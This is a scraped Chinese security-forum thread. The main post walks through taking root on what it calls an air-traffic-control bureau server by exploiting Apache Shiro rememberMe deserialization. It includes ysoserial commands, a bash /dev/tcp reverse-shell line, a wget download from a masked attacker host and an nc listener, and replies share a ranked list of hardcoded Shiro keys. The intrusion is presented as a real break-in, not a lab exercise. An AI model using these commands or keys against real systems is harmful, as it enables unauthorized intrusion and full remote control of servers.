12下一页
返回列表
回复发帖
帖子2 积分1 TCV0 TuBi1 坛龄84天
1#
跳转到»
倒序看帖
打印字体大小:
T00LS » 渗透测试文章(Security Articles) » 投稿文章：通过Shiro反序列化拿下某空管局服务器root权限
steven 新手上路
发表于
所需阅读权限 20
[【原创】]投稿文章：通过Shiro反序列化拿下某空管局服务器root 权限
xuehei|提醒短消息论坛任务|个人中心退出
首页版块搜索银行T00ls工具帮助
目标站返回rememberMe的cookie字段或者在请求包中含有rememberMe的cookie字段的时候,说明该目标站是用了shiro框架漏洞利用
①猜解密钥
前文中提到的硬编码的密钥,在实际生产环境中不同的项目可能会存在不同的密钥(key),从github上搜集了部分常用的key用于猜解,这里用到dnslog来判断是否成功.
可以看到当Key为kPH+bIxk5D2deZiIxcaaaA==时,服务器收到了目标站的请求,这里我们可以确定该站的key为
kPH+bIxk5D2deZiIxcaaaA==
②命令执行
这里我们利用ysoserial工具进行漏洞利用.
在服务器上执行
java -cp ysoserial-master-SNAPSHOT.jar
ysoserial.exploit.JRMPListener 2020 CommonsCollections1 'ping -c 1 sl0437.ceye.io'
可以看到已经接收到了目标站的请求,并且payload发送给目标站以后成功执行了ping命令.说明目标站CommonsCollections1存在反序列化漏洞
③反弹shell
在实战中发现,虽然可以成功执行命令了,但是由于runtime等环境因素并不能直接反弹shell,这个可以采用先下载后运行的方式.
打赏拍砖收藏分享00
支持反对
/bin/bash -i >& /dev/tcp/*.*.*.*/2019 0>&1
将反弹shell 的命令写成txt 然后放在web 目录下,
然后重新步骤②,这里修改一下执行的命令即可
java -cp ysoserial-master-SNAPSHOT .jar
ysoserial.exploit.JRMPListener 2020 CommonsCollections1 'wget http://*.*.*.*:8080/1.txt'
再依次在服务器上执行
java -cp ysoserial-master-SNAPSHOT .jar
ysoserial.exploit.JRMPListener 2020 CommonsCollections1
'sh 1.txt'
nc -lvv 2019
再次访问后成功获取到shell
本主题由t00ls 管理团队01 于 2019-8-28 23:29 移动
0顶0
踩
回复引用使用道具帖子679
积分359 TCV 14
TuBi 23
坛龄2930天
TOP1回复引用回顶部帖子333
积分266
TCV 0
TuBi 41
坛龄1146天
2#回复引用使用道具TOP 3#
无奈注册会员发表于 2019-8-28 16:14 | 只看该作者 | @该作者 | 顶(1) | 回复4#mrhonest14AvVhmFLUs0KTA3Kprsdag== : 190 3AvVhmFLUs0KTA3Kprsdag== : 157 Z3VucwAAAAAAAAAAAAAAAA== : 135 2AvVhdsgUs0FSA3SDFAdag== : 114 wGiHplamyXlVB11UXWol8g== : 35 kPH+bIxk5D2deZiIxcaaaA== : 27 fCq+/xW488hMTCD+cmJ3aQ== : 9 1QWLxg+NYmxraMoxAXu/Iw== : 9 ZUdsaGJuSmxibVI2ZHc9PQ== : 8 L7RioUULEFhRyxM7a2R/Yg== : 5 6ZmI6I2j5Y+R5aSn5ZOlAA== : 5 r0e3c16IdVkouZgk1TKVMg== : 4 ZWvohmPdUsAWT3=KpPqda : 4 5aaC5qKm5oqA5pyvAAAAAA== : 4 bWluZS1hc3NldC1rZXk6QQ== : 3 a2VlcE9uR29pbmdBbmRGaQ== : 3 WcfHGU25gNnTxTlmJMeSpw== : 3 LEGEND-CAMPUS-CIPHERKEY== : 3 3AvVhmFLUs0KTA3Kprsdag == : 3byyun189
注册会员
发表于 2019-8-28 15:20 来自 | 只看该作者 | @该作检测脚本可以共享一下吗？web 安全测试发表于 2019-8-28 15:55 来自 | 只看该作者 | @该作检测脚本可以学习学习吗
帖子960
积分273
TCV0
回复引用使用道具TOP 帖子1215
积分328
TCV0
TuBi26
坛龄1469天
4#
回复引用使用道具TOP
帖子679 积分359 TCV14 TuBi23 坛龄2930天5#
注册会员
姑娘！姑娘！我的好姑娘！
mrhonest1注册会员
发表于 2019-8-28 16:09 来自 | 只看该作者 | @该作能共享一下github上搜集了部分常用的key吗?
文能提笔控萝莉，武能床上定人妻
无奈
注册会员
发表于 2019-8-28 16:14 来自 | 只看该作者 | @该作回复4#mrhonest1
4AvVhmFLUs0KTA3Kprsdag== : 190
3AvVhmFLUs0KTA3Kprsdag== : 157
Z3VucwAAAAAAAAAAAAAAAA== : 135
2AvVhdsgUs0FSA3SDFAdag== : 114 wGiHplamyXlVB11UXWol8g== : 35
kPH+bIxk5D2deZiIxcaaaA== : 27
fCq+/xW488hMTCD+cmJ3aQ== : 9
1QWLxg+NYmxraMoxAXu/Iw== : 9 ZUdsaGJuSmxibVI2ZHc9PQ== : 8
L7RioUULEFhRyxM7a2R/Yg== : 5
6ZmI6I2j5Y+R5aSn5ZOlAA== : 5
r0e3c16IdVkouZgk1TKVMg== : 4 ZWvohmPdUsAWT3=KpPqda : 4
5aaC5qKm5oqA5pyvAAAAAA== : 4
回复引用使用道具TOP 帖子281
积分377
TCV 2 TuBi 469 坛龄1217天
6#回复引用使用道具TOP 帖子236
积分231
TCV 0
TuBi 9 坛龄1267天7#回复引用使用道具TOP
bWluZS1hc3NldC1rZXk6QQ== : 3 a2VlcE9uR29pbmdBbmRGaQ== : 3 WcfHGU25gNnTxTlmJMeSpw== : 3 LEGEND-CAMPUS-CIPHERKEY== : 3 3AvVhmFLUs0KTA3Kprsdag == : 3
jglimmers
注册会员
发表于 2019-8-28 17:53 来自 | 只看该作者 | @该作回复5#无奈脚本能共享下吗？u 神猴赛雷
注册会员
发表于 2019-8-28 21:16 来自 | 只看该作者 | @该作这个是什么漏洞，我怎么好像没有见过
回复引用使用道具TOP 帖子1215
积分328
TCV0
TuBi26
坛龄1469天
9#
回复引用使用道具TOP
帖子853 积分228 TCV0 TuBi107 坛龄3211天10#
crac01
回复6#jglimmers
我咋都没看到作者有提到啥脚本？...
mrhonest1注册会员
发表于 2019-8-29 13:21 来自 | 只看该作者 | @该作回复5#无奈
收到,谢谢
rdpclip.exe 注册会员
发表于 2019-8-31 12:37 来自iPhone客户端 | 只看该作者 | @ Dnslog运用的很好啊，点赞
12下一页
返回列表苏ICP 备13023583号|论坛统计
GMT+8, 2019-11-21 11:08. Powered by Discuz!1.0发表回复回帖后跳转到最后一页。